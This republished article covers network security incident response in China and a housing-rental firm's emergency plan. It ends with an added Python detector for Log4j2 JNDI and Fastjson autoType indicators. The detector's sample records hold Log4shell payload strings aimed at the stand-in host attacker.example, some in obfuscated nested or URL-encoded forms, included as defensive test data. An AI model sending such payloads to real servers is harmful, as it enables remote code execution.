Why Network Security Incident Response Matters: Strategies, Plans, and Real‑World Cases
This article outlines the current state of network security in China, the government's emphasis on it, the legal framework, why incident response is necessary, the emergency-response procedure itself, Ziru's own security program, and three case studies: the Apache Log4j2 remote code execution vulnerability, a 2021 emergency drill, and a FastJson deserialization vulnerability.
1. Overall Situation of Network Security
At the start of 2020, the COVID‑19 pandemic triggered a surge of APT attacks using the outbreak as bait. While the internet supported epidemic control, it also highlighted the widespread use of cloud computing, big data, IoT, 5G, and AI, and the growing threats of attacks, vulnerabilities, data leaks, scams, and ransomware.
2. High-Level Government Attention
Since the 18th Party Congress, President Xi Jinping has emphasized network security and informationization, forming the "Cyber‑Power" strategic thought that has driven significant progress in China’s cyber‑information sector.
3. Governing Network Security by Law
On June 1, 2017, the Cybersecurity Law took effect, establishing the foundational legal framework. By 2022, the Data Security Law and the Personal Information Protection Law (both in force since 2021), together with supporting regulations, had completed the "four-beam, eight-pillar" structure (a Chinese idiom for a basic load-bearing framework) of national cyberspace security.
4. Why Conduct Network Security Incident Response?
Incident response (or emergency response) refers to the preparations an organization makes before a security incident and the actions it takes when one occurs, in order to minimize the damage.
Two main activities are involved:
Pre‑event preparation: risk assessment, security planning, awareness training, early warnings, and preventive measures.
Post‑event mitigation: backup of affected systems, malware detection, backdoor removal, isolation, recovery, investigation, and forensic analysis.
These phases complement each other; proper planning guides effective response, and post‑event lessons improve future plans.
5. What Is Incident Response and Its Core Activities?
Most security incidents can be prevented or mitigated through a workable emergency plan, reducing economic and reputational losses and, in the worst cases, threats to life and safety.
The national emergency plan issued on June 27, 2017, defines network security incidents (e.g., malicious code, attacks, data breaches, infrastructure failures) and mandates a coordinated response mechanism.
6. Ziru’s Network Security Incident Response Construction
Ziru, a leading housing‑rental platform, complies with the Cybersecurity Law by implementing the graded (multi-level) protection system and by establishing a comprehensive emergency response framework.
6.1 Developing an Emergency Plan
The company drafted the "Ziru Network Security Incident Emergency Plan" in 2018, revised in 2019, covering plan activation conditions, organizational structure, resource guarantees, training, and regular reviews, as required by the law.
6.2 Forming an Emergency Leadership Team
The team is led by the CTO and includes heads of Information Security, Operations, Customer Service, Risk Control, Public‑Safety Business, and Brand/Public Relations.
6.3 Classifying and Grading Incidents
Incidents are categorized (e.g., malicious program, attack, data loss) and graded into three levels: major (Level I), significant (Level II), and general (Level III) based on impact.
6.4 Three Stages of a Security Incident
Preparation → Detection & Containment → Recovery & Post‑mortem.
6.5 Incident Response Process
A detailed flowchart (shown as an image in the original article, not reproduced here) guides each step from initial alert to resolution.
7. Case Studies
7.1 Apache Log4j2 Remote Code Execution Vulnerability
Response actions included rapid vulnerability assessment, patch deployment, and system monitoring.
7.2 2021 Network Security Emergency Drill
The drill simulated a large‑scale attack to test the emergency plan and team coordination.
7.3 FastJson Deserialization Vulnerability
Ziru executed an emergency response to mitigate the risk of arbitrary code execution.
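As an added example serving both the Log4j2 case (7.1) and the FastJson case (7.3), and not code from the original article or from Ziru: a small Python triage helper of the kind used during the "vulnerability assessment" and "monitoring" steps. It scans logged request fields for Log4j2 JNDI lookups, resolving nested and URL-encoded obfuscations before matching, and walks JSON bodies for Fastjson's `@type` autoType marker. The record layout, header names and every sample request are constructed assumptions; the real remediation in both cases remains upgrading the affected library.

```python
"""Triage helper for the two payload classes in the case studies above:
Log4j2 JNDI lookups in logged request fields and Fastjson '@type' autoType
markers in JSON bodies. Added illustrative code, not Ziru's tooling; all
request records below are constructed samples."""
import json
import re
from typing import List, Optional
from urllib.parse import unquote

# One innermost ${...} lookup (no nested braces inside it).
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# URL schemes the Log4j2 JNDI lookup will dereference.
_JNDI = re.compile(r"jndi:(?:ldaps?|rmi|dns|iiop|corba|nds|https?)", re.I)


def _resolve_lookup(body: str) -> str:
    """Evaluate one lookup body the way Log4j 2 would, closely enough for triage:
    ${x:-d} and ${::-d} yield the default d, ${lower:X}/${upper:X} change case,
    anything else (including jndi:...) is left as its body text."""
    if ":-" in body:
        return body.split(":-", 1)[1]
    head, sep, rest = body.partition(":")
    if sep and head.lower() == "lower":
        return rest.lower()
    if sep and head.lower() == "upper":
        return rest.upper()
    return body


def normalize_log4j(text: str) -> str:
    """URL-decode, then collapse nested lookups from the inside out until stable.
    Every pass removes at least one ${...} and inserts no new braces, so it ends."""
    text = unquote(text)
    prev = None
    while prev != text:
        prev = text
        text = _INNER_LOOKUP.sub(lambda m: _resolve_lookup(m.group(1)), text)
    return text


def log4shell_indicator(field: str) -> Optional[str]:
    """Return the matched 'jndi:<scheme>' token after de-obfuscation, or None."""
    m = _JNDI.search(normalize_log4j(field))
    return m.group(0) if m else None


def fastjson_type_keys(body: str) -> List[str]:
    """Collect every string value of an '@type' key anywhere in a JSON body.
    Fastjson uses that key to choose the class to instantiate (autoType); from
    untrusted input it is a finding whatever class is named, because whether a
    given class is exploitable depends on the classpath and library version.
    Non-JSON input yields []."""
    try:
        doc = json.loads(body)
    except ValueError:
        return []
    found: List[str] = []

    def walk(node) -> None:
        if isinstance(node, dict):
            for k, v in node.items():
                if k == "@type" and isinstance(v, str):
                    found.append(v)
                walk(v)
        elif isinstance(node, list):
            for v in node:
                walk(v)

    walk(doc)
    return found


def triage(records):
    """records: iterable of dicts with 'id', 'headers' (dict) and 'body' (str).
    Returns [(id, kind, detail)] for every indicator found."""
    findings = []
    for rec in records:
        for name, value in rec["headers"].items():
            hit = log4shell_indicator(value)
            if hit:
                findings.append((rec["id"], "log4shell", f"{name}: {hit}"))
        for cls in fastjson_type_keys(rec["body"]):
            findings.append((rec["id"], "fastjson-autotype", cls))
    return findings


# Constructed sample records (not real traffic); hostnames are placeholders.
SAMPLE_RECORDS = [
    {"id": 1, "headers": {"User-Agent": "Mozilla/5.0", "X-Forwarded-For": "10.0.0.8"},
     "body": '{"name": "alice", "tags": ["a", "b"]}'},
    {"id": 2, "headers": {"User-Agent": "${jndi:ldap://attacker.example/a}"}, "body": ""},
    {"id": 3, "headers": {"User-Agent": "${${lower:j}ndi:${::-l}${::-d}${::-a}${::-p}://attacker.example/b}"},
     "body": ""},
    {"id": 4, "headers": {"Referer": "%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fc%7D"}, "body": ""},
    {"id": 5, "headers": {"User-Agent": "curl/7.79 ${env:HOME} ${user.home}"}, "body": ""},
    {"id": 6, "headers": {"Content-Type": "application/json"},
     "body": '{"user": {"@type": "com.example.Any", "x": 1}, "items": [{"@type": "com.example.Other"}]}'},
    {"id": 7, "headers": {}, "body": "not json at all {"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_RECORDS):
        print(finding)
```

The point of `normalize_log4j` is that a plain substring match on `${jndi:` misses records 3 and 4 entirely; only after resolving `${lower:j}`, `${::-l}` and percent-encoding does the JNDI token appear, while the benign lookups in record 5 resolve to harmless text and stay quiet. For Fastjson, the walker reports `@type` wherever it occurs, including inside arrays, since an application that never expects a type hint from clients has no reason to see one in a request body.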
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact us and we will review it promptly.